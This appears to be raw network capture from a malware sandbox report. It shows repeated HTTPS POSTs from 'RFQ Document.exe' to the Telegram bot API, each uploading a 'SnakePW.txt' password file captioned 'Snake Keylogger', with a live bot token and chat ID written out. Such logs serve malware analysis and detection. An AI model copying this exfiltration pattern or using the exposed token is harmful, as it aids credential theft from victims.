                                            2021-09-28 05:58:22 UTC14OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 65 61 61 65 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c2eaaeaaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:22 UTC14INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 519
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:22 UTC15INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12588,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            90192.168.2.449866149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:40 UTC144OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cda53fd6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:40 UTC144OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 61 35 33 66 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cda53fd6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC144INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC145INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12673,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            91192.168.2.449867149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:40 UTC145OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cdc43fba
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:40 UTC146OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 63 34 33 66 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cdc43fbaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC146INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC146INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12674,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            92192.168.2.449868149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:40 UTC147OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cddc15cc
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:40 UTC147OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 64 63 31 35 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cddc15ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:40 UTC148INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:40 UTC148INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12675,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            93192.168.2.449869149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:41 UTC148OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cdf18b5f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:41 UTC149OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 66 31 38 62 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cdf18b5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:41 UTC149INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:41 UTC150INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12676,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            94192.168.2.449870149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:41 UTC150OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ce12ebba
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:41 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 31 32 65 62 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ce12ebbaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:41 UTC151INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:41 UTC151INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12677,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            95192.168.2.449871149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:41 UTC152OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ce55ad92
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:41 UTC152OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 35 35 61 64 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ce55ad92Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:41 UTC152INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:41 UTC153INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12678,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            96192.168.2.449872149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:41 UTC153OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ce6b24c9
                                            Host: api.telegram.org
                                            Content-Length: 407
